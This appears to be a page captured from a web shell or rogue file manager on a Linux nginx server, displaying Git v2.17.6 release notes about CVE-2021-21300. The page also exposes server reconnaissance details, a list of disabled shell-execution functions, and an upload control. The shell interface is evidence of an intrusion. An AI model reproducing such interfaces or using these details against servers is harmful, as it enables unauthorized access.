HEX
Server: nginx/1.24.0
System: Linux localhost 5.15.0-46-generic #49-Ubuntu SMP Thu Aug 4 18:03:25 UTC 2022 x86_64
User: www (1000)
PHP: 8.3.27
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
$ pwd: /usr/share/doc/git/RelNotes/
Upload Files
File: //usr/share/doc/git/RelNotes/2.17.6.txt
Git v2.17.6 Release Notes
=========================

This release addresses the security issues CVE-2021-21300.

Fixes since v2.17.5
-------------------

 * CVE-2021-21300:
   On case-insensitive file systems with support for symbolic links,
   if Git is configured globally to apply delay-capable clean/smudge
   filters (such as Git LFS), Git could be fooled into running
   remote code during a clone.

Credit for finding and fixing this vulnerability goes to Matheus
Tavares, helped by Johannes Schindelin.
@ Telegram